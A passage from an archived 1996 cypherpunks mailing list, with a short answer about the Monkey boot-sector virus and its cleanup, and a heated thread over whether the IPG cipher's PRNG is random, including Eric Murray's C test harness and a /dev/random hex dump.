had to work with glacial A/P departments more than once, for instance),
please let us know via e-mail, and we'll see if we can work something
out.

Planned speakers for DCSB are:

 February   David Kaufman    1996 in Review / Predictions for 1997
 March      TBA
 April      Stewart Baker    Encryption Policy and Digital Commerce

We are actively searching for future speakers.  If you are in Boston on
the first Tuesday of the month, and you would like to make a
presentation to the Society, please send e-mail to the DCSB Program
Commmittee, care of Robert Hettinga, rah@shipwright.com .

For more information about the Digital Commerce Society of Boston, send
"info dcsb" in the body of a message to majordomo@ai.mit.edu .  If you
want to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the
body of a message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston

-----BEGIN PGP SIGNATURE-----BY SAFEMAIL-----
Version: 1.0b5 e29

iQCVAwUBMq6xm/gyLN8bw6ZVAQFMMAP/f1zlK1gngnR8Lj3YXAIuKaZhw5ldsCb5
h0+JqPT6i6Yxxd64sOUosIZ20jgd2Msjg3Di3We4TfZVB/fZRq89sjDp+9CYd32o
MSN8ldSGbaTGabwvAMGWMG5OkCwBGYjPyxwSf6/iBZtb3VbWiTHdR+g/YMIkCKHJ
WMclXCtZAHU=
=1f7Q
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To unsubscribe from this list, send a letter to: Majordomo@ai.mit.edu
In the body of the message, write:  unsubscribe dcsb
Or, to subscribe,           write:  subscribe dcsb
If you have questions, write to me at Owner-DCSB@ai.mit.edu

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Wilson <serw30@laf.cioe.com>
Date: Wed, 11 Dec 1996 05:56:37 -0800 (PST)
To: "Aaron Burnett" <Burnett@vmi.edu>
Subject: Re: Virus?
Message-ID: <1.5.4.32.19961211135334.008962e0@gibson.cioe.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:10 PM 12/10/96 EST, you wrote:
>Has anybody heard of the Monkey_B virus?  If so what does it do exactly?  
>Also does anybody know where I could find a downloadable Win95 upgrade 
>upgrading Windows 3.x to Win95?
>
>

The Monkey virus ( I'm not sure what the "B" variant has altered ) is a
memory resident, stealth, boot infector that writes ( and encrypts!) the
partition table to side 0, cyl 0, sector 3 of your hard disk. It then
modifies your MBR to point to this location. When the virus is resident it
infects any floppy ( not write protected )that is accessed by the system. If
you need help with cleaning the Monkey from your system, try asking the
geniuses at alt.comp.virus for some help. Keep in mind they argue with each
other more than cypherpunks do! Here's a hint on cleanup, booting clean and
running Fdisk/mbr will remove the virus from your hard disk, but it WILL NOT
restore your partition table!

Eric





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 11 Dec 1996 07:41:55 -0800 (PST)
To: wichita@cyberstation.net
Subject: Re: IPG algorithim
In-Reply-To: <Pine.BSI.3.95.961211020454.11832D-100000@citrine.cyberstation.net>
Message-ID: <199612111534.JAA00488@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Don, Eric -- 

I think that Eric simply tried to test the PRNG without the tables,
to see how good it is.

igor

wichita@cyberstation.net wrote:
> 
> 
> 
> 
> On Sat, 30 Nov 1996, Eric Murray wrote:
> 
> 
> Eric, unlike all the other forespeakers, I do appreciate the fact that
> you tried to understand the algorithm and implement it. However, you
> have several things wrong, the most important being that the PRNG
> produces ONLY a seed for the main algorithm and over short sequences, 
> for example 53^2, that is only slightly over  an average occurrence
> of 8 each for the 256 ASC II characters, and the seed streams are
> congruent. However, the algorithm uses a 3 dimensional table lookup to
> translate the numbers to the Encryptor stream. 
> 
> I suggest that you get a free copy of the operating program, generate your
> own key, and then run the output through any meaningful test that you
> might desire. That would indeed establish whether or not our system does 
> what we claim it will do or not. It does, but neither my words or your
> partial tests prove anything. 
> 
> The expected occurrence of an identical repeat, that is a where the same
> seed gives the same result is 1 in 2^36. Of course that does not mean that
> the same resultant encryptor character might not be generate because there
> are only 256 possibilities, so the same character would result from the
> same seed at least 1 in 256 times, and of course statistically more
> frequently than that, but the over sequence of events leading to the
> production of that character is different. 
> 
> While I do appreciate your effort to understand and implement the
> algorithm, it would be helpful if you would contact me first and get a
> copy of the keys and everything detailed in the web site. I take it that
> you used the abbreviated version, or failed to read all the information etal.
> If you use the tables and so forth detailed at the web site and use the
> full algorithm, the results will be far different as you will find.
> 
>    
> 
> 
>  > > 
> > I have translated the IPG algorithim's "engine" to C, to generate
> > some random values from it for testing purposes.  It does not
> > look very random in either the xnoisesph program or the DIEHARD
> > test battery.   However I may well have misinterprested Mr. Wood's
> > description (his writing is, as Mr. Chudov points out, difficult to
> > understand) or written my code incorrectly.  Here it is, play
> > with it yourself.  To my untrained eye the lack of randomness
> > in what's essentially a stream cipher would be disturbing.
> > However I am not a cryptoanalysist so I do not know to
> > what extent this weakens the cipher.
> > 
> > 
> > The IPG description does not say (but implies to me) that
> > the various tables that are to be filled in by "random" values must
> > be filled in by PRNGs that are seeded with the same seeds by
> > each of the party that knows the key.  Otherwise the "encryptor
> > streams" that are generated will be unrelated and decryption will not
> > be possible.  To make my test work I have used the simple rand()
> > function to fill in the tables.
> > 
> > 
> > Corrections are welcome.
> > 
> > 
> > 
> > #include <stdio.h>
> > 
> > /* a C translation of the IPG "EUREKA" algorithim's "engine".
> > ** This is supposed to produce random numbers for the IPG
> > ** "encryptor stream".
> > ** See http://www.netprivacy.com/ for the original description.
> > ** Eric Murray  ericm@lne.com  This code placed under GNU copyleft.  */
> > 
> > /* machine-dependent stuff, change to suit different platforms: */
> > typedef unsigned char byte;
> > typedef unsigned short uint16;
> > 
> > 
> > /* tables: */
> > uint16 A[53];
> > uint16 B[53];
> > uint16 C[53];
> > 
> > 
> > int init_table(uint16*table, uint16 min, uint16 max)
> > {
> > 	/* IPG specifies no algorithim for producing the "random"
> > 	** initial values in the ABC tables, but it's obvious that
> > 	** it requires a PRNG that's somehow seeded from the "key".
> > 	** I've just used rand() here.  In UNIX rand() called with no
> > 	** seed is supposed to seed itself with 0. */
> > 	int i;
> > 	int count, r;
> >
> Wrong - the algorithms are specified at the web site - look again. You
> cannot just use rand(). That is patently absurd.
>  
> > 	for(i = 0; i < 53; i++) {
> > 		table[i] = min + (rand() % (max - min));
> > 	}
> > }
> > 
> > main(int argc, char **argv)
> > {
> > 	uint16 jv;
> > 	int argcnt, i, n, count, diehard, nelem;
> > 
> > 	diehard = 0;
> > 	argcnt = 1;
> > 	if (argc >= 2) {
> > 		if (strncmp(argv[argcnt],"-d") == 0) {
> > 			diehard++;
> > 			argcnt++;
> > 		}
> > 	}
> > 	if (argc > argcnt - 1 ) {
> > 		n = atoi(argv[argcnt]);
> > 		fprintf(stderr,"Generating %d values\n",n);
> > 	}
> > 	else {
> > 		n = 2000;
> > 	}
> > 
> > 	/* seed tables: */
> > 	fprintf(stderr,"Seeding:  A");  fflush(stderr);
> > 	init_table(A,0,65535);
> > 	fprintf(stderr," B");  fflush(stderr);
> > 	init_table(B,0,12227);
> > 	fprintf(stderr," C");  fflush(stderr);
> > 	init_table(C,16384,20361);
> > 	fprintf(stderr,"\n");  fflush(stderr);
> > 
> > 	/* generate n values: */
> > 	for(; n > 0; n--) {
> > 		/* jv is "random" (where's it seeded from?) */
> from the key 
> 
> > 		jv = (uint16)(rand() % 53);
> > 
> > 		/* count limits the number of traverses to 53^2 so we don't get stuck */
> > 		for(count = 0; count < 2809; count++) {
> > 			jv++;
> > 			if (jv == 53) jv = 0;
> > 			A[jv] = (A[jv] + B[jv]) % C[jv];
> > 			if (A[jv] < 16384) break;
> > 		}
> > 		if (count == 2809) fprintf(stderr,"Oops.\n");
> > 		else {
> > 			if (!diehard) {
> > 				printf("%d\n",A[jv]);
> > 			}
> > 			else {
> > 				/* print output in DIEHARD required format:
> > 				** actually since we have 16-bit ints and DIEHARD
> > 				** wants 32-bit ints, we print 20 per line instead of 10 */
> > 				if (nelem++ > 19) {printf("\n"); nelem = 0;}
> > 				printf("%4.4x",(unsigned int)A[jv]);
> > 			}
> > 		}
> > 	}
> > }
> > 
> > 
> > 
> > -- 
> But they do not reference the same table entries either as is plain to see.
> Your implementation, while appreciated, is plain flawed in many respects. We do not use any
> special As, Bs and Cs. Any selection will do.  
> 
> If you are going to implement that algorithm, please use all of it, not
> just the seed generator. I grant you that with only 53 different
> equations, the resultant seed numbers do not give a random CHI square,
> especially over short frame sizes. Certainly over 53^2, it would give you
> staccato results. Not only that, but they are congruent. Nevertheless,
> this is more of the supercilious half ass crap that writers post. If you
> implement the rest  of the algorithm, you will find that it does always
> meet the Chi Square tests for randomness, not sometimes but always. I have
> posted  over 200 megabytes of data to our web site and it is still there.
> Pick any spot in the data, and run your chi squares tests on it. 
> 
> If you are going to try to critiqued the IPG algorithm, please use the
> entire algorithm set out. There are so many things wrong with your
> implementation, that it would take me days to cover everything.
> I suggest that you get a sample copy of our operating program , generate
> your own Keys and then analyze the output data. Then if it does not
> perform as we have stated you can tear us apart. But your meaningless
> jabberwocky means nothing other than you have at least tried to understand
> the algorithm, which to repeat, we appreciate.
>  
> 
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 11 Dec 1996 07:42:06 -0800 (PST)
To: wichita@cyberstation.net
Subject: Re: IPG algorithim
In-Reply-To: <Pine.BSI.3.95.961211033046.11832G-100000@citrine.cyberstation.net>
Message-ID: <199612111538.JAA00529@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


wichita@cyberstation.net wrote:
> 
> 
> 
> Igor, Eric,
> 
> As I have noted to Eric, I appreciate that at least both of you are trying
> to understand and implement the algorithm. My comments follow:
> 
> On Sat, 30 Nov 1996, Igor Chudov @ home wrote:
> 
> > [This is an addition to my previous reply to Eric]
> > 
> > It bugs me that you are using rand() (a fairly lame pseudo-random
> > function that was never intended to be used in cryptographic
> > applications) to seed A, B, C and JV and then test the A(JV) for
> > randomness. Some may object to that. Just for fun, I am attaching a hex
> > dump of output from my /dev/random (Linux 2.0.24). You could simply take
> > these truly random values and put them in initial A, B, C and JV, just
> > to be sure.
> > 
> > I doubt though that your results (poor randomness of A(JV)) will be
> > any different.
> 
> 
> I agree, and as I have indicated elsewhere, either the B or the C is
                                                       ^^^^^^^^^^^^^^^^
> is a prime number. The numbers in A, B, and C are not random numbers,

Don, see my another letter that I sent out last night. What you _need_ 
to require is that C is prime, not B.

Suppose B == p -- some prime number, A == 1, and C == 2*B.

This triplet would fit your criteria, but would be BAD because the only
two numbers it will generate is 1 and P+1.

That would be a rather biased output :)

igor

> they are only selected randomly in a manner almost identical to a LOTTO 
> selections, except that the pools are much larger and the order is
> very significant.
> 
> There are so many things that are wrong with the Murray
> implementation that it would be takes days to clarify it. It is simply not
> the algorithm, nor even any significant part of it. The actual As, Bs and
> Cs are specified at the Web ,site as is the algorithm for using the Key to
> select the ones actually used. In the example, 53 of 512 As, 53 of 600
> plus Bs, and 53 of some 500 plus Cs.
> 
> 
> > 
> > igor
> > 
> > 0000000 c76d 74ac b253 ffc3 ae97 e092 629c 7a53
> > 0000010 087a 21e6 8c2c 0ab6 a03a ea3c 0c71 a748
> > 0000020 68f0 540d a4f2 0a2b b62b 4ab6 ddaa d3e4
> > 0000030 a795 51f3 7dff 067d 2f6b 8d18 fa23 0200
> > 0000040 99df 1d97 e232 b8d5 381f cf1e 7ea8 d971
> > 0000050 8aa0 df0b cf41 53e2 a9f5 5304 dc28 c242
> > 0000060 c01b 5990 75a1 688d 497f cc54 d336 217e
> > 0000070 7dd7 4800 09d4 ff5b 53b8 6308 d38f 60f5
> > 0000080 513a 3ea7 90f6 4cdf e783 6a14 145a e2b1
> > 0000090 2041 6bb5 f417 6109 6101 fecd b7f1 7287
> > 00000a0 f31a 6cb4 d559 ed7c 1be8 e0ca 21f9 8779
> > 00000b0 701e bbcc 8909 7743 bfef c5ef 0f60 cd6a
> > 00000c0 565b 30b5 e710 5f66 aa83 0751 5bc7 867e
> > 00000d0 87a8 8511 9969 d101 c1bb 871b a2e5 f579
> > 00000e0 5e14 9167 480a 9fc2 8354 5769 4ee0 7765
> > 00000f0 faf5 c29f 25ad 77ea 9ecf 39b4 2d11 969f
> > 0000100 099c f85a 7240 9922 0513 d607 41ea ba29
> > 0000110 1886 2611 e577 50c6 87af 393a 782a 6666
> > 0000120 9ae0 221e ec58 ce2e de77 b6de 5821 82e9
> > 0000130 db17 5027 7e57 567a 2e82 f056 01d0 2cde
> > 0000140 0314 ac33 78bd d569 215e b8d7 6a3b 0caa
> > 0000150 b44f 8c6c 04de 4cf2 e111 2803 a073 7d27
> > 0000160 f78c 9d28 70ca 1cd4 ce53 5dea 3141 efa9
> > 0000170 8246 c7ee 4ed3 e49a 8d97 8ded d818 327a
> > 0000180 f999 e044 ff28 ffe9 0254 535c 7e70 a09c
> > 0000190 af58 bcd2 07b0 8146 f4cc 7568 751c c6ee
> > 00001a0 b6b7 be3f d870 84ce 7f8c 3ec4 1427 09fc
> > 00001b0 706e 93f8 9752 230b 74cd 0b0b 38be ba5b
> > 00001c0 a9a6 062a cdee f11d d367 37e2 ec4f 90e4
> > 00001d0 9019 d9ff 2ff9 fb5d 559b 4dd0 2ab0 7e35
> > 00001e0 184a 3e90 f072 7349 007f 5d41 c176 8d8a
> > 00001f0 a30c 1a68 eca6 63f4 256f 88e1 2cec dc1a
> > 0000200 a0ac 90f0 b515 2fbc 2778 4e66 2323 7528
> > 0000210 59c3 c3a9 3ccd e29d 315a fa6a 7821 f6e4
> > 0000220 7977 5e9f df6c f87e 5d15 5693 3da8 9790
> > 0000230 faaf d028 0c05 f5f0 160a 8cb7 f726 18cf
> > 0000240 796d 77c5 3c2e 5ddb f770 7183 3c17 81b7
> > 0000250 b0ff ad01 a4d3 26a1 7821 d210 376a 8283
> > 0000260 3860 61a9 c509 e34c 46a4 7f70 b2ff 18db
> > 0000270 24ad 97b5 e474 eee2 9036 c125 3fdb 88ce
> > 0000280 824a 3096 98fc 0b9f 2f3a 6ac3 25e1 8d08
> > 0000290 46c6 7218 ea87 3c6d 6395 6fc5 34b0 1447
> > 00002a0 ddb3 b3af fdbf b545 5f47 0fe6 bfd0 e799
> > 00002b0 99f6 1fc6 c70b 524f 717f a25d 9f08 f78a
> > 00002c0 e230 b4b9 2045 5652 9677 5ce3 a827 9e8f
> > 00002d0 261f 4650 c731 afbb e257 8410 621a 09aa
> > 00002e0 d991 7a3b bb68 4995 fd15 2afc 8e26 842b
> > 00002f0 cdf7 2d13 4055 9d22 be44 aa16 ed06 db8a
> > 0000300 4210 714b 330d 6c9e 3f81 c993 4d8b 2f6b
> > 0000310 134f 1566 8170 9cc6 4cff d188 78c4 29ae
> > 0000320 27ec 731f 391c 6241 ffaf 2967 8756 1517
> > 0000330 5d1a e807 c477 7757 bd6a ff4c 1cf1 01ce
> > 0000340 dfa7 25b4 5a4f 9cf0 e96e 2d69 0de0 c24e
> > 0000350 0a2c 9ec8 112d 0851 c028 917b b00b f9a0
> > 0000360 0b07 b9f0 c4ef 4426 1cce c8c8 7186 8c24
> > 0000370 9868 fe68 9136 1316 1e58 e883 5aa9 1298
> > 0000380 c0ed eaa4 aaa2 7f23 48d1 5056 8837 06ec
> > 0000390 5f69 ce3a 3d5b 1e7a 7545 e237 352d d887
> > 00003a0 df9c 734d a441 7fa5 6685 eff0 4ce8 1876
> > 00003b0 f9c9 2e18 f825 3a3a a6b8 e0cc 5d49 136a
> > 00003c0 853d dd88 c0f8 befc 8b87 e261 fd73 09af
> > 00003d0 b392 3afa f38e 6a25 cc5d b624 1012 49f3
> > 00003e0 31b0 196c aa02 b3f2 454a 7817 2198 5ad7
> > 00003f0 84c5 f22d 8b6e cdc9 12c3 d0b5 b866 9976
> > 0000400 97a7 3b5e dedf 201d 50f5 99a6 bf54 04ab
> > 0000410 a34e 3a66 538c 51a0 c00b 7ae8 f2ae 6343
> > 0000420 c5f1 1ef1 1f8f 7415 5b50 53a4 33ad d046
> > 0000430 13b6 62a2 cc34 feee 7fda 671a 2b28 a36c
> > 0000440 a806 15be 1ccc b5b9 ef85 04ca 168c 8cd0
> > 0000450 c44e d117 a6c8 cbaf 3b5b 581c d94a 8469
> > 0000460 effb 0f18 cd45 5c77 6ab1 1289 e385 9771
> > 0000470 199f 5610 8095 be8b e257 2ef8 a221 99ee
> > 0000480 1d8b c81c 9781 e803 e4ab 4afb 5669 efb1
> > 0000490 b31f 36e2 5930 b838 e84c 4f6e a709 0c40
> > 00004a0 fefe c530 4ee2 ee3a aa2e e278 de99 8b1e
> > 00004b0 4e83 c98a 47cd 4715 081d 7c7d 5f6f 657c
> > 00004c0 49b5 70c0 937a d4c2 39ff d282 8768 1d7c
> > 00004d0 40fe 1ed1 59b9 d0f7 b4cc 55b3 5da2 4118
> > 00004e0 14dc 4b71 202a fb96 0bed 6d2a 03d6 2f2d
> > 00004f0 9056 8d84 8b6e 948b 4b89 efd1 53ba 9a13
> > 0000500 ea01 770a dc40 fcad bf69 cf60 7884 3f66
> > 0000510 b057 2e82 3745 2839 f68d f637 ad95 5463
> > 0000520 ff3c 353d 08b2 44c2 72bb b25b f60d 0dbf
> > 0000530 455a e9b4 8bbf 3307 071a f720 f00e 0217
> > 0000540 f8cc f7cc 2cc4 ef14 e6b6 7dbc ceff 2dea
> > 0000550 fc34 ed72 d59b 8cd2 794c 2d11 e470 ba44
> > 0000560 bff3 c531 b38b 5398 4a46 63be d86b ae19
> > 0000570 d6a4 2e8d da0d 0ff9 a3db 2cc4 0494 72b1
> > 0000580 b871 1f7e b8da a2f0 2f63 b522 3212 43da
> > 0000590 f910 374e b1f5 5462 8db0 65ef 5e5b 9bf1
> > 00005a0 9337 5003 31fc 47a9 8c06 d0d8 c8ab 8732
> > 00005b0 ff5e 7fe3 b43c 9ba0 14dd f31f cf4c a5b5
> > 00005c0 5552 b1ee 0ee6 a38f dc2b 32ac ab80 e12d
> > 00005d0 be8c ad7d 89e9 5cda 0781 f30c b1d1 3163
> > 00005e0 72f9 bcbe 5972 1862 3a15 660f 4227 b168
> > 00005f0 280d 35fa 1765 46f3 468b 0538 44fc 216e
> > 0000600 30f6 8340 6805 7f5c a280 fcdf 563d 9751
> > 0000610 50c9 fb04 065c 12ec 9ce3 34ee 2a3d f821
> > 0000620 d43e b64e 067f fd26 5e94 b7d1 9b28 fbcf
> > 0000630 811b 4631 6018 5385 1297 e37a b0ea c6fd
> > 
> > Eric Murray wrote:
> > > 
> > > 
> > > 
> > > I have translated the IPG algorithim's "engine" to C, to generate
> > > some random values from it for testing purposes.  It does not
> > > look very random in either the xnoisesph program or the DIEHARD
> > > test battery.   However I may well have misinterprested Mr. Wood's
> > > description (his writing is, as Mr. Chudov points out, difficult to
> > > understand) or written my code incorrectly.  Here it is, play
> > > with it yourself.  To my untrained eye the lack of randomness
> > > in what's essentially a stream cipher would be disturbing.
> > > However I am not a cryptoanalysist so I do not know to
> > > what extent this weakens the cipher.
> > > 
> > > 
> > > The IPG description does not say (but implies to me) that
> > > the various tables that are to be filled in by "random" values must
> > > be filled in by PRNGs that are seeded with the same seeds by
> > > each of the party that knows the key.  Otherwise the "encryptor
> > > streams" that are generated will be unrelated and decryption will not
> > > be possible.  To make my test work I have used the simple rand()
> > > function to fill in the tables.
> > > 
> > > 
> > > Corrections are welcome.
> > > 
> > > 
> > > 
> > > #include <stdio.h>
> > > 
> > > /* a C translation of the IPG "EUREKA" algorithim's "engine".
> > > ** This is supposed to produce random numbers for the IPG
> > > ** "encryptor stream".
> > > ** See http://www.netprivacy.com/ for the original description.
> > > ** Eric Murray  ericm@lne.com  This code placed under GNU copyleft.  */
> > > 
> > > /* machine-dependent stuff, change to suit different platforms: */
> > > typedef unsigned char byte;
> > > typedef unsigned short uint16;
> > > 
> > > 
> > > /* tables: */
> > > uint16 A[53];
> > > uint16 B[53];
> > > uint16 C[53];
> > > 
> > > 
> > > int init_table(uint16*table, uint16 min, uint16 max)
> > > {
> > > 	/* IPG specifies no algorithim for producing the "random"
> > > 	** initial values in the ABC tables, but it's obvious that
> > > 	** it requires a PRNG that's somehow seeded from the "key".
> > > 	** I've just used rand() here.  In UNIX rand() called with no
> > > 	** seed is supposed to seed itself with 0. */
> > > 	int i;
> > > 	int count, r;
> > > 
> > > 	for(i = 0; i < 53; i++) {
> > > 		table[i] = min + (rand() % (max - min));
> > > 	}
> > > }
> > > 
> > > main(int argc, char **argv)
> > > {
> > > 	uint16 jv;
> > > 	int argcnt, i, n, count, diehard, nelem;
> > > 
> > > 	diehard = 0;
> > > 	argcnt = 1;
> > > 	if (argc >= 2) {
> > > 		if (strncmp(argv[argcnt],"-d") == 0) {
> > > 			diehard++;
> > > 			argcnt++;
> > > 		}
> > > 	}
> > > 	if (argc > argcnt - 1 ) {
> > > 		n = atoi(argv[argcnt]);
> > > 		fprintf(stderr,"Generating %d values\n",n);
> > > 	}
> > > 	else {
> > > 		n = 2000;
> > > 	}
> > > 
> > > 	/* seed tables: */
> > > 	fprintf(stderr,"Seeding:  A");  fflush(stderr);
> > > 	init_table(A,0,65535);
> > > 	fprintf(stderr," B");  fflush(stderr);
> > > 	init_table(B,0,12227);
> > > 	fprintf(stderr," C");  fflush(stderr);
> > > 	init_table(C,16384,20361);
> > > 	fprintf(stderr,"\n");  fflush(stderr);
> > > 
> > > 	/* generate n values: */
> > > 	for(; n > 0; n--) {
> > > 		/* jv is "random" (where's it seeded from?) */
> > > 		jv = (uint16)(rand() % 53);
> > > 
> > > 		/* count limits the number of traverses to 53^2 so we don't get stuck */
> > > 		for(count = 0; count < 2809; count++) {
> > > 			jv++;
> > > 			if (jv == 53) jv = 0;
> > > 			A[jv] = (A[jv] + B[jv]) % C[jv];
> > > 			if (A[jv] < 16384) break;
> > > 		}
> > > 		if (count == 2809) fprintf(stderr,"Oops.\n");
> > > 		else {
> > > 			if (!diehard) {
> > > 				printf("%d\n",A[jv]);
> > > 			}
> > > 			else {
> > > 				/* print output in DIEHARD required format:
> > > 				** actually since we have 16-bit ints and DIEHARD
> > > 				** wants 32-bit ints, we print 20 per line instead of 10 */
> > > 				if (nelem++ > 19) {printf("\n"); nelem = 0;}
> > > 				printf("%4.4x",(unsigned int)A[jv]);
> > > 			}
> > > 		}
> > > 	}
> > > }
> > > 
> > > 
> > > 
> > > -- 
> > 
> > 
> > 
> > 	- Igor.
> > 
> 
> With Kindest Regards,
> 
> Don Wood
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 11 Dec 1996 07:42:45 -0800 (PST)
To: wichita@cyberstation.net
Subject: Re: IPG algorithim
In-Reply-To: <Pine.BSI.3.95.961211034239.11832H-100000@citrine.cyberstation.net>
Message-ID: <199612111539.JAA00672@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


These are all good tests, BUT all they can tell you is a negative. Ie, 
if some tests fail, the RNG is certainly BAD. If they do not fail, we
still can't say that the RNG is good.

igor

wichita@cyberstation.net wrote:
> > 
> > You are also bringing a good point that Chi-squared tests are not
> > sufficient to make any conclusions about usefulness of this particular
> > pseudo random number generator.
> > 
> > 	- Igor.
> > 
> Chi Squares alone are not sufficient but we are only talking about the
> seed algorithm, and at our web sites, you will find Standard Deviations,
> Chi Squares, Delta ICs, autocorrelations, cross correlations, and a
> variety of other tests done on single characters, couplets - pairs,
> first differences, second differences, offset differences and all kinds of
> other tests. 
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 11 Dec 1996 07:46:48 -0800 (PST)
To: wichita@cyberstation.net
Subject: Re: IPG algorithim
In-Reply-To: <Pine.BSI.3.95.961211035154.11832J-100000@citrine.cyberstation.net>
Message-ID: <199612111540.JAA00703@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


wichita@cyberstation.net wrote:
> 
> 
> 
> Everything is still screwed up. The As, Bs and Cs are selected in much the
> same fashion as LOTTO numbers except that the pools are much larger and
> order is significant. They are not random, that would never work.

Maybe I missed something at your website, but... how exactly they
are selected? Where is it described?

igor

> On Sat, 30 Nov 1996, Eric Murray wrote:
> 
> > 
> > Igor Chudov @ home writes:
> > > 
> > > [This is an addition to my previous reply to Eric]
> > > 
> > > It bugs me that you are using rand() (a fairly lame pseudo-random
> > > function that was never intended to be used in cryptographic
> > > applications) to seed A, B, C and JV and then test the A(JV) for
> > > randomness. Some may object to that.
> > 
> > Yea, you're right, rand() is lame.
> > 
> > I added /dev/random to my Linux box and changed my small test to use it.
> > I also changed the way that I use JV- I had been setting it to a random
> > value for each trip through the "engine", but since I beleive that
> > its value can't really be random (if you want to be able to have someone
> > decrypt your stuff :-) but must be exchanged in the key, I set it
> > to a random value once and then let it float.  It's also a lot faster
> > that way, /dev/random is pretty slow (because it's looking for real
> > random material).
> > 
> > My results from xnoisesph were wrong- xnoisesph wants random bytes
> > instead of random integers in ascii format as I was producing.
> > Changing it (as I have below) makes the xnoisesph output look
> > much better, but it still isn't all that random.  The random seed generators
> > I have written that get their randomness from repeated calls
> > to high-resolution timers and hashes of system log files do better.
> > I also fixed a minor bug in arg processing.
> > 
> > 
> > 
> > 
> > 
> > 
> > #include <stdio.h>
> > #include <fcntl.h>
> > 
> > /* a C translation of the IPG "EUREKA" algorithim's "engine".
> > ** This is supposed to produce random numbers for the IPG
> > ** "encryptor stream".
> > ** See http://www.netprivacy.com/ for the original description.
> > ** Eric Murray  ericm@lne.com  This code placed under GNU copyleft. 
> > ** V0.2 */
> > 
> > typedef unsigned char byte;
> > typedef unsigned short uint16;
> > 
> > 
> > /* tables: */
> > uint16 A[53];
> > uint16 B[53];
> > uint16 C[53];
> > 
> > 
> > #ifndef NO_DEV_RANDOM
> > uint16 getrand()
> > {
> > 	uint16 ret;
> > 	int fd = open("/dev/random",O_RDONLY);
> > 	if (fd <= 0) {
> > 		perror("/dev/random"); exit(-1);
> > 	}
> > 	read(fd,(unsigned char *)(&ret),sizeof(ret));
> > 	close(fd);
> > 	return(ret);
> > }
> > #else
> > /* do something appropriate for your OS here, rand() is lame. */
> > #define getrand rand
> > #endif
> > 
> > 
> > int init_table(uint16*table, uint16 min, uint16 max)
> > {
> > 	/* IPG specifies no algorithim for producing the "random"
> > 	** initial values in the ABC tables, but it's obvious that
> > 	** it requires a PRNG that's somehow seeded from the "key".
> > 	** I've used /dev/random here, so there's no question that
> > 	** I'm starting out with pretty good random values. */
> > 	int i;
> > 	int count, r;
> > 
> > 	for(i = 0; i < 53; i++) {
> > 		table[i] = min + (getrand() % (max - min));
> > 	}
> > }
> > 
> > main(int argc, char **argv)
> > {
> > 	uint16 jv;
> > 	int argcnt, i, n, count, diehard, nelem;
> > 
> > 	diehard = 0;
> > 	argcnt = 1;
> > 	if (argc >= 2) {
> > 		if (strncmp(argv[argcnt],"-d",2) == 0) {
> > 			diehard++;
> > 			argcnt++;
> > 		}
> > 	}
> > 	if (argc > argcnt - 1 ) {
> > 		n = atoi(argv[argcnt]);
> > 		fprintf(stderr,"Generating %d values\n",n);
> > 	}
> > 	else {
> > 		n = 2000;
> > 	}
> > 
> > 	/* seed tables: */
> > 	fprintf(stderr,"Seeding:  A");  fflush(stderr);
> > 	init_table(A,0,65535);
> > 	fprintf(stderr," B");  fflush(stderr);
> > 	init_table(B,0,12227);
> > 	fprintf(stderr," C");  fflush(stderr);
> > 	init_table(C,16384,20361);
> > 	fprintf(stderr,"\n");  fflush(stderr);
> > 
> > 	/* generate n values: */
> > 	/* jv is "random" (where's it seeded from?) */
> > 	jv = (uint16)(getrand() % 53);
> > 	for(; n > 0; n--) {
> > 
> > 		/* count limits the number of traverses to 53^2 so we don't get stuck */
> > 		/* 2809 is actually too low per Chudov:
> > 		** "For example, if ALL B == 1, A == 16385, and C == 20361, the
> > 		**  loop may need (20361-16385) passes to get to the < 16384 value."
> > 		*/
> > 		for(count = 0; count < 2809; count++) {
> > 			jv++;
> > 			if (jv == 53) jv = 0;
> > 			A[jv] = (A[jv] + B[jv]) % C[jv];
> > 			if (A[jv] < 16384) break;
> > 		}
> > 		if (count == 2809) fprintf(stderr,"Oops.\n");
> > 		else {
> > 			if (!diehard) {
> > 				write(1,(unsigned char *)&A[jv],sizeof(uint16));
> > 			}
> > 			else {
> > 				/* print output in DIEHARD required format:
> > 				** actually since we have 16-bit ints and DIEHARD
> > 				** wants 32-bit ints, we print 20 per line instead of 10 */
> > 				if (nelem++ > 19) {printf("\n"); nelem = 0;}
> > 				printf("%4.4x",(unsigned int)A[jv]);
> > 			}
> > 		}
> > 	}
> > }
> > -- 
> > Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
> > PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF
> > 
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 11 Dec 1996 07:46:56 -0800 (PST)
To: wichita@cyberstation.net
Subject: Re: Ignoramus Chewed-Off on IPG algorithm
